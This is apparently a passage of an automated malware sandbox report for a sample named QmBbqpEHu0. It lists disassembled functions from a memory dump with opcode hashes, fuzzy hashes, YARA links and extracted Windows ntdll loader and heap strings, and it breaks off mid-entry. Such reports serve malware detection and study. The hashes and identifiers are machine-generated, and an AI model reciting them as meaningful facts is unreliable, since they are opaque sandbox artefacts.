                                                                                                                                      • Instruction ID: 70ab90042a3d36bc48ece20a69110b5b6613236de1f56952ea0b987fd4a41942
                                                                                                                                      • Opcode Fuzzy Hash: 0784899f664b46459984781d242e4c204c322996c6f648afae983b60901c4e29
                                                                                                                                      • Instruction Fuzzy Hash: F6E04F716002147BC720AA6AEC41F9B775CDBC5714F00401AFA0967281D675B91187F5
                                                                                                                                      Function 01002C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 364 1002c0a-1002c0f 365 1002c11-1002c18 364->365 366 1002c1f-1002c26 LdrInitializeThunk 364->366
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: f77f0b6a16c5d16a1c0a2f399eabaecee99fa8ceb72dfa96a5df1adc0b1a437b
                                                                                                                                      • Instruction ID: 9150c5892b5b84b56578f49eaf216de565dcb3c1bb924312406f110358bc5803
                                                                                                                                      • Opcode Fuzzy Hash: f77f0b6a16c5d16a1c0a2f399eabaecee99fa8ceb72dfa96a5df1adc0b1a437b
                                                                                                                                      • Instruction Fuzzy Hash: BDB09B729415C5C6FA52E764460CB17794077D1701F55C066D2430685F873CC1D1E275

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 01042349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 0-2160512332
                                                                                                                                      • Opcode ID: 54d4c8af04d06683ada8fe7a5406e353ccb76e259082ae076fb2a0f7364c3b4c
                                                                                                                                      • Instruction ID: 6c678ab458657b589aa3ab3c19dbe12bef5bcf1d3b22d939b63cadec9308a44d
                                                                                                                                      • Opcode Fuzzy Hash: 54d4c8af04d06683ada8fe7a5406e353ccb76e259082ae076fb2a0f7364c3b4c
                                                                                                                                      • Instruction Fuzzy Hash: 08929CB1604341ABE721DF28D880BABBBE8BF84754F04496DFAD4D7291D774E844CB92
                                                                                                                                      Function 00FF8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • Critical section debug info address, xrefs: 0103541F, 0103552E
                                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010354E2
                                                                                                                                      • 8, xrefs: 010352E3
                                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010354CE
                                                                                                                                      • Thread identifier, xrefs: 0103553A
                                                                                                                                      • Critical section address., xrefs: 01035502
                                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 01035543
                                                                                                                                      • double initialized or corrupted critical section, xrefs: 01035508
                                                                                                                                      • Address of the debug info found in the active list., xrefs: 010354AE, 010354FA
                                                                                                                                      • Critical section address, xrefs: 01035425, 010354BC, 01035534
                                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0103540A, 01035496, 01035519
                                                                                                                                      • Invalid debug info address of this critical section, xrefs: 010354B6
                                                                                                                                      • corrupted critical section, xrefs: 010354C2
                                                                                                                                      • undeleted critical section in freed memory, xrefs: 0103542B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                      • API String ID: 0-2368682639
                                                                                                                                      • Opcode ID: f466b22447658f3176211e26f73e73e4c88dd67e3b390e382572ab0331534c09
                                                                                                                                      • Instruction ID: 00c4f1be52fdd4a96aafbe7ef2bffc9fe06e82156ce1fbfbcc502e58f2f76645
                                                                                                                                      • Opcode Fuzzy Hash: f466b22447658f3176211e26f73e73e4c88dd67e3b390e382572ab0331534c09
                                                                                                                                      • Instruction Fuzzy Hash: 5981ABB0A40348AFDB20CF99CC45BAEBBF9BF49B14F104059F944B7290D7B5A945DB60
                                                                                                                                      Function 00FF29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010322E4
                                                                                                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01032412
                                                                                                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010324C0
                                                                                                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01032498
                                                                                                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01032409
                                                                                                                                      • @, xrefs: 0103259B
                                                                                                                                      • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01032602
                                                                                                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010325EB
                                                                                                                                      • RtlpResolveAssemblyStorageMapEntry, xrefs: 0103261F
                                                                                                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01032624
                                                                                                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01032506
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                      • API String ID: 0-4009184096
                                                                                                                                      • Opcode ID: 09061dd0c28ededf94068002cf7e718919b7342d8837a63bad0530a60b252931
                                                                                                                                      • Instruction ID: ead77c326ae6cb7f86b5fcc76bb37e6e41582298ce489e107709431ea588296b
                                                                                                                                      • Opcode Fuzzy Hash: 09061dd0c28ededf94068002cf7e718919b7342d8837a63bad0530a60b252931
                                                                                                                                      • Instruction Fuzzy Hash: 2B0260F2D002299BDB61DB14CD80BEDB7B8AF44714F0041EAA749A7251EB70AF84DF59
                                                                                                                                      Function 01068B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                      • API String ID: 0-2515994595
                                                                                                                                      • Opcode ID: c7d0be3e44c902b08ac57d14e0ecf3bd0a45b32aaeb0341ea2dad1ca9100eccf
                                                                                                                                      • Instruction ID: b227a3355d42cba22e956d4b7248ed456c026790b1c7a34320644469af58638e
                                                                                                                                      • Opcode Fuzzy Hash: c7d0be3e44c902b08ac57d14e0ecf3bd0a45b32aaeb0341ea2dad1ca9100eccf
                                                                                                                                      • Instruction Fuzzy Hash: 0E51E2715183059BD725EF188848BABBBECEF94350F14891EF9D8C3285E770D504DBA2
                                                                                                                                      Function 01070274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                      • API String ID: 0-1700792311
                                                                                                                                      • Opcode ID: 47612ecbf0e40417379ceb077fb1d0f55d783a2c62618e74a39531a459e32728
                                                                                                                                      • Instruction ID: 55ef875fdda1f307e9208c60df18c3ff21d755db089d0edaacb65d4242ffa08c
                                                                                                                                      • Opcode Fuzzy Hash: 47612ecbf0e40417379ceb077fb1d0f55d783a2c62618e74a39531a459e32728
                                                                                                                                      • Instruction Fuzzy Hash: C7D1F231900685DFDB22DF69C851AEEBBF1FF4A700F088199F5859B256C739D940DB18
                                                                                                                                      Function 010489B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01048A67
                                                                                                                                      • VerifierDlls, xrefs: 01048CBD
                                                                                                                                      • VerifierDebug, xrefs: 01048CA5
                                                                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01048A3D
                                                                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 01048B8F
                                                                                                                                      • HandleTraces, xrefs: 01048C8F
                                                                                                                                      • VerifierFlags, xrefs: 01048C50
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                      • API String ID: 0-3223716464
                                                                                                                                      • Opcode ID: 170c646c0017b0c1e8263405661c2acfd167b13c87f72b8c3a4727090f9b31ad
                                                                                                                                      • Instruction ID: c6c5a1611405f32b8c7831ff2c6bde5109c598d7bdda139db71eecf20d21171d
                                                                                                                                      • Opcode Fuzzy Hash: 170c646c0017b0c1e8263405661c2acfd167b13c87f72b8c3a4727090f9b31ad
                                                                                                                                      • Instruction Fuzzy Hash: C99109F16463069FD721EFA88CC1B9A77E4AB85714F0489BAFAC06B241C775EC00CB95
                                                                                                                                      Function 00FCEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                      • API String ID: 0-1109411897
                                                                                                                                      • Opcode ID: b6391f5bd9514e33bb3db573b3ab6979e979294c734738e9a6e5b1e08f52c51a
                                                                                                                                      • Instruction ID: eb7f990a081251da86c365718df1f8cfb7698b02733ffdce4df2099d451dd4c9
                                                                                                                                      • Opcode Fuzzy Hash: b6391f5bd9514e33bb3db573b3ab6979e979294c734738e9a6e5b1e08f52c51a
                                                                                                                                      • Instruction Fuzzy Hash: 8BA24771E0562ACFDB64CF18CD89BA9BBB5AF45314F2442EAD84DA7250DB309E85DF00
                                                                                                                                      Function 00FF63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 0-792281065
                                                                                                                                      • Opcode ID: 08cbb6ce99290d40397a33a3573b391bcbc44dea2ca78548cad6376d5939a4c2
                                                                                                                                      • Instruction ID: 1d1aca62dcea9d604e3638d2a23ce2f9851134c9905539597dcdca215a12f195
                                                                                                                                      • Opcode Fuzzy Hash: 08cbb6ce99290d40397a33a3573b391bcbc44dea2ca78548cad6376d5939a4c2
                                                                                                                                      • Instruction Fuzzy Hash: D2913871B007159BEB35EF14DC85BEA3BA4BF81B24F140169E680FF291DB799801E791
                                                                                                                                      Function 00FB645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01019A2A
                                                                                                                                      • LdrpInitShimEngine, xrefs: 010199F4, 01019A07, 01019A30
                                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010199ED
                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01019A11, 01019A3A
                                                                                                                                      • apphelp.dll, xrefs: 00FB6496
                                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01019A01
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 0-204845295
                                                                                                                                      • Opcode ID: 776e6ebe77679419641bd9347f532e538d7ddf27884dd8125a9f9e0175d6551e
                                                                                                                                      • Instruction ID: 63fe8fe9c778365148df9db985eefcb94814aa9dad5d89f616d883c25883f833
                                                                                                                                      • Opcode Fuzzy Hash: 776e6ebe77679419641bd9347f532e538d7ddf27884dd8125a9f9e0175d6551e
                                                                                                                                      • Instruction Fuzzy Hash: 3351CE722483049FE720DF28C891BAB77E8FB84748F54091AF5859B195D739E904EB93
                                                                                                                                      Function 00FFC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 01038170
                                                                                                                                      • LdrpInitializeProcess, xrefs: 00FFC6C4
                                                                                                                                      • LdrpInitializeImportRedirection, xrefs: 01038177, 010381EB
                                                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 010381E5
                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 00FFC6C3
                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01038181, 010381F5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                      • API String ID: 0-475462383
                                                                                                                                      • Opcode ID: 0de20951c279e73931b0d5fa1f701036f41e8afd0db8eeed6d1d1d8f033301e9
                                                                                                                                      • Instruction ID: fe8031259aaac4395dc6c4fda0774a4b52c4fa0f546ca28fbe1882057e2a6e96
                                                                                                                                      • Opcode Fuzzy Hash: 0de20951c279e73931b0d5fa1f701036f41e8afd0db8eeed6d1d1d8f033301e9
                                                                                                                                      • Instruction Fuzzy Hash: 2E3127B16483569FD220EF28DD86E6A77D8EFC4B10F040568F984AB2D1E624ED04D7A3
                                                                                                                                      Function 00FF2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 01032160, 0103219A, 010321BA
                                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 01032165
                                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010321BF
                                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01032180
                                                                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01032178
                                                                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0103219F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                      • API String ID: 0-861424205
                                                                                                                                      • Opcode ID: b69414eecaa656899352c0ecfc4811733b3fed30dcea9fb25b3b6f7d788a0a50
                                                                                                                                      • Instruction ID: 2352ee89f9f5d1d72e9edf14acf013a7748b09dd3ae189095afa0f5f1565c276
                                                                                                                                      • Opcode Fuzzy Hash: b69414eecaa656899352c0ecfc4811733b3fed30dcea9fb25b3b6f7d788a0a50
                                                                                                                                      • Instruction Fuzzy Hash: BD31067AF4021977E721AA998D85F6E7B68DFA5B50F050069FB04B7190D2B0DE00E6A1
                                                                                                                                      Function 0100096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 01002DF0: LdrInitializeThunk.NTDLL ref: 01002DFA
                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01000BA3
                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01000BB6
                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01000D60
                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01000D74
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1404860816-0
                                                                                                                                      • Opcode ID: 837dc9ffb9c8773c7874889d95e5c0b520822cf3ce02b494e5049f792a8b1a23
                                                                                                                                      • Instruction ID: 9080a932853423e0caee04f353d0193b30f85c6c179e6d6bcb7d228d02665dfc
                                                                                                                                      • Opcode Fuzzy Hash: 837dc9ffb9c8773c7874889d95e5c0b520822cf3ce02b494e5049f792a8b1a23
                                                                                                                                      • Instruction Fuzzy Hash: 75427E71900705DFEB61CF28C840BAAB7F5FF44314F1485AAE989EB285D770AA85CF61
                                                                                                                                      Function 00FCA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                      • API String ID: 0-379654539
                                                                                                                                      • Opcode ID: 665caa8eaeaa9cfdf5170839928ee9a16283e6c4085476ec01f0a9cd8356954a
                                                                                                                                      • Instruction ID: 137e6e98c57e18c2eb3dc57918dd73c76efa9dead8972de6b098f6cee594ec4d
                                                                                                                                      • Opcode Fuzzy Hash: 665caa8eaeaa9cfdf5170839928ee9a16283e6c4085476ec01f0a9cd8356954a
                                                                                                                                      • Instruction Fuzzy Hash: 99C1CD7150838ACFC715CF58C241B6AB7E4BF84708F14886EF9868B251E778E945EB53
                                                                                                                                      Function 00FF8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • LdrpInitializeProcess, xrefs: 00FF8422
                                                                                                                                      • @, xrefs: 00FF8591
                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 00FF8421
                                                                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00FF855E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                      • API String ID: 0-1918872054
                                                                                                                                      • Opcode ID: 7626c5559cd7b2a91a6aff99a5d9ea5ddcc9cadba28b8e312da81452cffb7f55
                                                                                                                                      • Instruction ID: b2f341e06a8ccba072b49841ee1411a7ace0ff9dd3471234402059b909ac707d
                                                                                                                                      • Opcode Fuzzy Hash: 7626c5559cd7b2a91a6aff99a5d9ea5ddcc9cadba28b8e312da81452cffb7f55
                                                                                                                                      • Instruction Fuzzy Hash: 03918E71508345AFE721EF21CC41FABB6ECBF84794F44092EFA8492161E734D905DB52
                                                                                                                                      Function 00FF273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010321D9, 010322B1
                                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010322B6
                                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 010321DE
                                                                                                                                      • .Local, xrefs: 00FF28D8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                      • API String ID: 0-1239276146
                                                                                                                                      • Opcode ID: cf3544e84b4fd2fd032a54f8e43568a9e9ed56ef3053717f82299dadae2a7fa6
                                                                                                                                      • Instruction ID: 4e6b1a1c39a9b62ac0d3689ab62f45853c87652b3a28a72e0320c6be87eb3918
                                                                                                                                      • Opcode Fuzzy Hash: cf3544e84b4fd2fd032a54f8e43568a9e9ed56ef3053717f82299dadae2a7fa6
                                                                                                                                      • Instruction Fuzzy Hash: 4DA1AD32D0122D9BDB74DF64CC84BA9B3B5BF58314F2541EADA48A7261D7709E80EF90
                                                                                                                                      Function 00FF4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0103342A
                                                                                                                                      • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01033437
                                                                                                                                      • RtlDeactivateActivationContext, xrefs: 01033425, 01033432, 01033451
                                                                                                                                      • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01033456
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
